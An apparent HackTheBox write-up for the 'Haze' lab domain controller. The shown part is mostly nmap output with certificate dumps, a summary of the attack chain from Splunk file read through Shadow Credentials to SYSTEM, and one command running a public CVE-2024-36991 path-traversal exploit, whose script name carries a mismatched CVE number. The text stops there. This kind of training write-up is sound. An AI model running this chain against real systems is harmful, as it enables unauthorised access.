Executive Summary
Haze is a Hard difficulty Windows Active Directory machine on HackTheBox. The compromise chain demonstrates vulnerabilities in Splunk arbitrary file reads (CVE-2024-36991), gMSA security configurations, AD object ownership abuse via WriteOwner, and Shadow Credentials PKINIT-based authentication.
Initial foothold is gained through CVE-2024-36991 (Splunk arbitrary file read) to extract LDAP credentials for paul.taylor. Lateral movement via password spray to mark.adams, who manages the Haze-IT-Backup$ gMSA. A Shadow Credentials attack is mounted against edward.martin using a WriteOwner → GenericAll chain. Final privilege escalation is achieved via Splunk admin panel RCE to SYSTEM with SeImpersonatePrivilege.
Reconnaissance
1
| nmap -T4 -vv -sC -sV -oN nmap/intial 10.10.11.61
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
| # Nmap 7.94SVN as: /usr/lib/nmap/nmap -T4 -vv -sC -sV -oN nmap/intial 10.10.11.61
Nmap scan report for 10.10.11.61
Host is up, received reset ttl 127 (0.27s latency).
Scanned at 2025-03-30 06:01:12 IST for 72s
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-30 03:02:20Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA/domainComponent=haze
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
| SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
| -----BEGIN CERTIFICATE-----
| MIIFxzCCBK+gAwIBAgITaQAAAAKwulKDkCsWNAAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEaGF6ZTEV
| MBMGA1UEAxMMaGF6ZS1EQzAxLUNBMB4XDTI1MDMwNTA3MTIyMFoXDTI2MDMwNTA3
| MTIyMFowGDEWMBQGA1UEAxMNZGMwMS5oYXplLmh0YjCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAMVEY8/MHbIODtBJbIisSbPresil0O6vCchYn7gAIg90
| kJVVmM/KnsY8tnT6jMRGWQ/cJPpXQ/3jFFK1l40iDHxa5zfWLz+RS/ZRwkQH9/UK
| biVcpiAkxgDsvBpqVk5AQiSPo3cOkiFAAS31jjfUJk6YP9Cb5q1dJTlo39TlTnyZ
| h794W7ykOJTKLLflQ1gY5xtbrc3XltNGnKTh28fjX7GtDfqtAq3tT5jU7pt9kKfu
| 0PdFjwM0IHjvxfMvQQD3kZnwIxMFCPNgS5T1xO86UnrWw0kVvWp1gOMA7lU5YZr7
| u81y2pV734gwCnZzWOe0xZrvUzFgIHtGmfj505znnf0CAwEAAaOCAt4wggLaMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFCjRdOU7YKvR8L/epppe
| wGlE7zYrMB8GA1UdIwQYMBaAFBfPKa3j+shDCWYQcAiLgjtywmU+MIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPWhhemUtREMwMS1DQSxDTj1kYzAx
| LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPWhhemUsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| uwYIKwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1oYXpl
| LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9aGF6ZSxEQz1odGI/Y0FDZXJ0aWZp
| Y2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwOQYD
| VR0RBDIwMKAfBgkrBgEEAYI3GQGgEgQQ3PAm6jow6ke+SMbceyLBfYINZGMwMS5o
| YXplLmh0YjANBgkqhkiG9w0BAQsFAAOCAQEAO7h/k9EY8RlqV48OvhS9nUZtGI7e
| 9Dqja1DpS+H33Z6CYb537w7eOkIWZXNP45VxPpXai8IzPubc6rVHKMBq4DNuN+Nu
| BjOvbQ1J4l4LvfB1Pj/W2nv6VGb/6/iDb4ul6UdHK3/JMIKM3UIbpWVgmNIx70ae
| /0JJP2aG3z2jhO5co4ncUQ/xpe3WlWGTl9qcJ+FkZZAPkZU6+fgz/McKxO9I7EHv
| Y7G19nhuwF6Rh+w2XYrJs2/iFU6pRgQPg3yon5yUzcHNX8GwyEikv0NGBkmMKwAI
| kE3gssbluZx+QYPdAE4pV1k5tbg/kLvBePIXVKspHDd+4Wg0w+/6ivkuhQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA/domainComponent=haze
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
| SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
| -----BEGIN CERTIFICATE-----
| MIIFxzCCBK+gAwIBAgITaQAAAAKwulKDkCsWNAAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEaGF6ZTEV
| MBMGA1UEAxMMaGF6ZS1EQzAxLUNBMB4XDTI1MDMwNTA3MTIyMFoXDTI2MDMwNTA3
| MTIyMFowGDEWMBQGA1UEAxMNZGMwMS5oYXplLmh0YjCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAMVEY8/MHbIODtBJbIisSbPresil0O6vCchYn7gAIg90
| kJVVmM/KnsY8tnT6jMRGWQ/cJPpXQ/3jFFK1l40iDHxa5zfWLz+RS/ZRwkQH9/UK
| biVcpiAkxgDsvBpqVk5AQiSPo3cOkiFAAS31jjfUJk6YP9Cb5q1dJTlo39TlTnyZ
| h794W7ykOJTKLLflQ1gY5xtbrc3XltNGnKTh28fjX7GtDfqtAq3tT5jU7pt9kKfu
| 0PdFjwM0IHjvxfMvQQD3kZnwIxMFCPNgS5T1xO86UnrWw0kVvWp1gOMA7lU5YZr7
| u81y2pV734gwCnZzWOe0xZrvUzFgIHtGmfj505znnf0CAwEAAaOCAt4wggLaMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFCjRdOU7YKvR8L/epppe
| wGlE7zYrMB8GA1UdIwQYMBaAFBfPKa3j+shDCWYQcAiLgjtywmU+MIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPWhhemUtREMwMS1DQSxDTj1kYzAx
| LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPWhhemUsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| uwYIKwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1oYXpl
| LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9aGF6ZSxEQz1odGI/Y0FDZXJ0aWZp
| Y2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwOQYD
| VR0RBDIwMKAfBgkrBgEEAYI3GQGgEgQQ3PAm6jow6ke+SMbceyLBfYINZGMwMS5o
| YXplLmh0YjANBgkqhkiG9w0BAQsFAAOCAQEAO7h/k9EY8RlqV48OvhS9nUZtGI7e
| 9Dqja1DpS+H33Z6CYb537w7eOkIWZXNP45VxPpXai8IzPubc6rVHKMBq4DNuN+Nu
| BjOvbQ1J4l4LvfB1Pj/W2nv6VGb/6/iDb4ul6UdHK3/JMIKM3UIbpWVgmNIx70ae
| /0JJP2aG3z2jhO5co4ncUQ/xpe3WlWGTl9qcJ+FkZZAPkZU6+fgz/McKxO9I7EHv
| Y7G19nhuwF6Rh+w2XYrJs2/iFU6pRgQPg3yon5yUzcHNX8GwyEikv0NGBkmMKwAI
| kE3gssbluZx+QYPdAE4pV1k5tbg/kLvBePIXVKspHDd+4Wg0w+/6ivkuhQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA/domainComponent=haze
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
| SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
| -----BEGIN CERTIFICATE-----
| MIIFxzCCBK+gAwIBAgITaQAAAAKwulKDkCsWNAAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEaGF6ZTEV
| MBMGA1UEAxMMaGF6ZS1EQzAxLUNBMB4XDTI1MDMwNTA3MTIyMFoXDTI2MDMwNTA3
| MTIyMFowGDEWMBQGA1UEAxMNZGMwMS5oYXplLmh0YjCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAMVEY8/MHbIODtBJbIisSbPresil0O6vCchYn7gAIg90
| kJVVmM/KnsY8tnT6jMRGWQ/cJPpXQ/3jFFK1l40iDHxa5zfWLz+RS/ZRwkQH9/UK
| biVcpiAkxgDsvBpqVk5AQiSPo3cOkiFAAS31jjfUJk6YP9Cb5q1dJTlo39TlTnyZ
| h794W7ykOJTKLLflQ1gY5xtbrc3XltNGnKTh28fjX7GtDfqtAq3tT5jU7pt9kKfu
| 0PdFjwM0IHjvxfMvQQD3kZnwIxMFCPNgS5T1xO86UnrWw0kVvWp1gOMA7lU5YZr7
| u81y2pV734gwCnZzWOe0xZrvUzFgIHtGmfj505znnf0CAwEAAaOCAt4wggLaMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFCjRdOU7YKvR8L/epppe
| wGlE7zYrMB8GA1UdIwQYMBaAFBfPKa3j+shDCWYQcAiLgjtywmU+MIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPWhhemUtREMwMS1DQSxDTj1kYzAx
| LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPWhhemUsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| uwYIKwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1oYXpl
| LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9aGF6ZSxEQz1odGI/Y0FDZXJ0aWZp
| Y2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwOQYD
| VR0RBDIwMKAfBgkrBgEEAYI3GQGgEgQQ3PAm6jow6ke+SMbceyLBfYINZGMwMS5o
| YXplLmh0YjANBgkqhkiG9w0BAQsFAAOCAQEAO7h/k9EY8RlqV48OvhS9nUZtGI7e
| 9Dqja1DpS+H33Z6CYb537w7eOkIWZXNP45VxPpXai8IzPubc6rVHKMBq4DNuN+Nu
| BjOvbQ1J4l4LvfB1Pj/W2nv6VGb/6/iDb4ul6UdHK3/JMIKM3UIbpWVgmNIx70ae
| /0JJP2aG3z2jhO5co4ncUQ/xpe3WlWGTl9qcJ+FkZZAPkZU6+fgz/McKxO9I7EHv
| Y7G19nhuwF6Rh+w2XYrJs2/iFU6pRgQPg3yon5yUzcHNX8GwyEikv0NGBkmMKwAI
| kE3gssbluZx+QYPdAE4pV1k5tbg/kLvBePIXVKspHDd+4Wg0w+/6ivkuhQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA/domainComponent=haze
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after: 2026-03-05T07:12:20
| MD5: db18:a1f5:986c:1470:b848:35ec:d437:1ca0
| SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
| -----BEGIN CERTIFICATE-----
| MIIFxzCCBK+gAwIBAgITaQAAAAKwulKDkCsWNAAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBCMRMwEQYKCZImiZPyLGQBGRYDaHRiMRQwEgYKCZImiZPyLGQBGRYEaGF6ZTEV
| MBMGA1UEAxMMaGF6ZS1EQzAxLUNBMB4XDTI1MDMwNTA3MTIyMFoXDTI2MDMwNTA3
| MTIyMFowGDEWMBQGA1UEAxMNZGMwMS5oYXplLmh0YjCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAMVEY8/MHbIODtBJbIisSbPresil0O6vCchYn7gAIg90
| kJVVmM/KnsY8tnT6jMRGWQ/cJPpXQ/3jFFK1l40iDHxa5zfWLz+RS/ZRwkQH9/UK
| biVcpiAkxgDsvBpqVk5AQiSPo3cOkiFAAS31jjfUJk6YP9Cb5q1dJTlo39TlTnyZ
| h794W7ykOJTKLLflQ1gY5xtbrc3XltNGnKTh28fjX7GtDfqtAq3tT5jU7pt9kKfu
| 0PdFjwM0IHjvxfMvQQD3kZnwIxMFCPNgS5T1xO86UnrWw0kVvWp1gOMA7lU5YZr7
| u81y2pV734gwCnZzWOe0xZrvUzFgIHtGmfj505znnf0CAwEAAaOCAt4wggLaMC8G
| CSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAd
| BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgG
| CSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDAL
| BglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQME
| AQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFCjRdOU7YKvR8L/epppe
| wGlE7zYrMB8GA1UdIwQYMBaAFBfPKa3j+shDCWYQcAiLgjtywmU+MIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPWhhemUtREMwMS1DQSxDTj1kYzAx
| LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD
| Tj1Db25maWd1cmF0aW9uLERDPWhhemUsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| uwYIKwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1oYXpl
| LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9aGF6ZSxEQz1odGI/Y0FDZXJ0aWZp
| Y2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwOQYD
| VR0RBDIwMKAfBgkrBgEEAYI3GQGgEgQQ3PAm6jow6ke+SMbceyLBfYINZGMwMS5o
| YXplLmh0YjANBgkqhkiG9w0BAQsFAAOCAQEAO7h/k9EY8RlqV48OvhS9nUZtGI7e
| 9Dqja1DpS+H33Z6CYb537w7eOkIWZXNP45VxPpXai8IzPubc6rVHKMBq4DNuN+Nu
| BjOvbQ1J4l4LvfB1Pj/W2nv6VGb/6/iDb4ul6UdHK3/JMIKM3UIbpWVgmNIx70ae
| /0JJP2aG3z2jhO5co4ncUQ/xpe3WlWGTl9qcJ+FkZZAPkZU6+fgz/McKxO9I7EHv
| Y7G19nhuwF6Rh+w2XYrJs2/iFU6pRgQPg3yon5yUzcHNX8GwyEikv0NGBkmMKwAI
| kE3gssbluZx+QYPdAE4pV1k5tbg/kLvBePIXVKspHDd+4Wg0w+/6ivkuhQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
8000/tcp open http syn-ack ttl 127 Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-favicon: Unknown favicon MD5: E60C968E8FF3CC2F4FB869588E83AFC6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp open ssl/http syn-ack ttl 127 Splunkd httpd
|_http-server-header: Splunkd
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/emailAddress=support@splunk.com/localityName=San Francisco
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
| SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
| -----BEGIN CERTIFICATE-----
| MIIDMjCCAhoCCQCtNoIdTvT1CjANBgkqhkiG9w0BAQsFADB/MQswCQYDVQQGEwJV
| UzELMAkGA1UECAwCQ0ExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xDzANBgNVBAoM
| BlNwbHVuazEXMBUGA1UEAwwOU3BsdW5rQ29tbW9uQ0ExITAfBgkqhkiG9w0BCQEW
| EnN1cHBvcnRAc3BsdW5rLmNvbTAeFw0yNTAzMDUwNzI5MDhaFw0yODAzMDQwNzI5
| MDhaMDcxIDAeBgNVBAMMF1NwbHVua1NlcnZlckRlZmF1bHRDZXJ0MRMwEQYDVQQK
| DApTcGx1bmtVc2VyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3SOu
| w9/K07cQT0p+ga9FjWCzI0Os/MVwpjOlPQ/o1uA/VSoNiweXobD3VBLngqfGQlAD
| VGRWkGdD3xS9mOknh9r4Dut6zDyUdKvgrZJVoX7EiRsHhXAr9HRgqWj7khQLz3n9
| fjxxdJkXtGZaNdonWENSeb93HfiYGjSWQJMfNdTd2lMGMDMC4JdydEyGEHRAMNnZ
| y/zCOSP97yJOSSBbr6IZxyZG934bbEH9d9r0g/I4roDlzZFFBlGi542s+1QJ79FR
| IUrfZh41PfxrElITkFyKCJyU5gfPKIvxwDHclE+zY/ju2lcHJMtgWNvF6s0S9ic5
| oxg0+Ry3qngtwd4yUQIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQCbT8LwPCoR7I41
| dS2ZjVjntxWHf/lv3MgumorerPBufJA4nw5Yq1gnAYruIkAkfGS7Dy09NL2+SwFy
| NKZa41K6OWst/sRP9smtpY3dfeNu5ofTP5oLEbW2fIEuG4fGvkQJ0SQOPOG71tfm
| ymVCjLlMYMU11GPjfb3CpVh5uLRhIw4btQ8Kz9aB6MiBomyiD/MqtQgA25thnijA
| gHYEzB3W6FKtWtjmPcqDugGs2WU6UID/fFZpsp+3h2QLGN5e+e1OTjoIbexbJ/S6
| iRjTy6GUjsrHtHM+KBjUFvUvHi27Ns47BkNzA1gedvRYrviscPCBkphjo9x0qDdj
| 3EhgaH2L
|_-----END CERTIFICATE-----
| http-robots.txt: 1 disallowed entry
|_/
8089/tcp open ssl/http syn-ack ttl 127 Splunkd httpd
|_http-title: splunkd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/emailAddress=support@splunk.com/localityName=San Francisco
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after: 2028-03-04T07:29:08
| MD5: 82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
| SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
| -----BEGIN CERTIFICATE-----
| MIIDMjCCAhoCCQCtNoIdTvT1CjANBgkqhkiG9w0BAQsFADB/MQswCQYDVQQGEwJV
| UzELMAkGA1UECAwCQ0ExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xDzANBgNVBAoM
| BlNwbHVuazEXMBUGA1UEAwwOU3BsdW5rQ29tbW9uQ0ExITAfBgkqhkiG9w0BCQEW
| EnN1cHBvcnRAc3BsdW5rLmNvbTAeFw0yNTAzMDUwNzI5MDhaFw0yODAzMDQwNzI5
| MDhaMDcxIDAeBgNVBAMMF1NwbHVua1NlcnZlckRlZmF1bHRDZXJ0MRMwEQYDVQQK
| DApTcGx1bmtVc2VyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3SOu
| w9/K07cQT0p+ga9FjWCzI0Os/MVwpjOlPQ/o1uA/VSoNiweXobD3VBLngqfGQlAD
| VGRWkGdD3xS9mOknh9r4Dut6zDyUdKvgrZJVoX7EiRsHhXAr9HRgqWj7khQLz3n9
| fjxxdJkXtGZaNdonWENSeb93HfiYGjSWQJMfNdTd2lMGMDMC4JdydEyGEHRAMNnZ
| y/zCOSP97yJOSSBbr6IZxyZG934bbEH9d9r0g/I4roDlzZFFBlGi542s+1QJ79FR
| IUrfZh41PfxrElITkFyKCJyU5gfPKIvxwDHclE+zY/ju2lcHJMtgWNvF6s0S9ic5
| oxg0+Ry3qngtwd4yUQIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQCbT8LwPCoR7I41
| dS2ZjVjntxWHf/lv3MgumorerPBufJA4nw5Yq1gnAYruIkAkfGS7Dy09NL2+SwFy
| NKZa41K6OWst/sRP9smtpY3dfeNu5ofTP5oLEbW2fIEuG4fGvkQJ0SQOPOG71tfm
| ymVCjLlMYMU11GPjfb3CpVh5uLRhIw4btQ8Kz9aB6MiBomyiD/MqtQgA25thnijA
| gHYEzB3W6FKtWtjmPcqDugGs2WU6UID/fFZpsp+3h2QLGN5e+e1OTjoIbexbJ/S6
| iRjTy6GUjsrHtHM+KBjUFvUvHi27Ns47BkNzA1gedvRYrviscPCBkphjo9x0qDdj
| 3EhgaH2L
|_-----END CERTIFICATE-----
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46282/tcp): CLEAN (Couldn't connect)
| Check 2 (port 18830/tcp): CLEAN (Couldn't connect)
| Check 3 (port 26877/udp): CLEAN (Failed to receive data)
| Check 4 (port 63173/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-03-30T03:03:13
|_ start_date: N/A
|_clock-skew: 2h31m01s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|
The target is clearly a Domain Controller (dc01.haze.htb) with the full suite of AD services — DNS, Kerberos, LDAP, SMB, and Global Catalog. The presence of an ADCS CA (haze-DC01-CA) is also notable from the LDAP certificate.
Splunk is present on three ports: 8000 (Splunk Web UI), 8088 (Splunk HTTP Event Collector — used by applications to push log data), and 8089 (Splunk management REST API, commonly abused for credential harvesting and RCE via endpoint /services/auth/login). Both 8088 and 8089 use self-signed SSL certificates.
Web Enumeration
Navigating to http://haze.htb:8000 presents a Splunk login page on port 8000, confirming the Splunk web interface:
1
| http://haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
|
1
| https://advisory.splunk.com/advisories
|
CVE-2024-36991 is an arbitrary file read vulnerability in Splunk Enterprise (versions below 9.2.2, 9.1.5, and 9.0.10). It allows an unauthenticated attacker to read arbitrary files on the Splunk server by sending crafted requests containing path traversal sequences (C:../).
Here is blog and POC
Initial Access via CVE-2024-36991
CVE-2024-36991 is an arbitrary file read vulnerability in Splunk Enterprise (versions below 9.2.2, 9.1.5, and 9.0.10). It allows an unauthenticated attacker to read arbitrary files by sending crafted requests with path traversal sequences (C:../).
Use the public exploit to confirm the vulnerability and read Splunk configuration files:
1
| python3 CVE-2024-26991.py -u http://haze.htb:8000
|
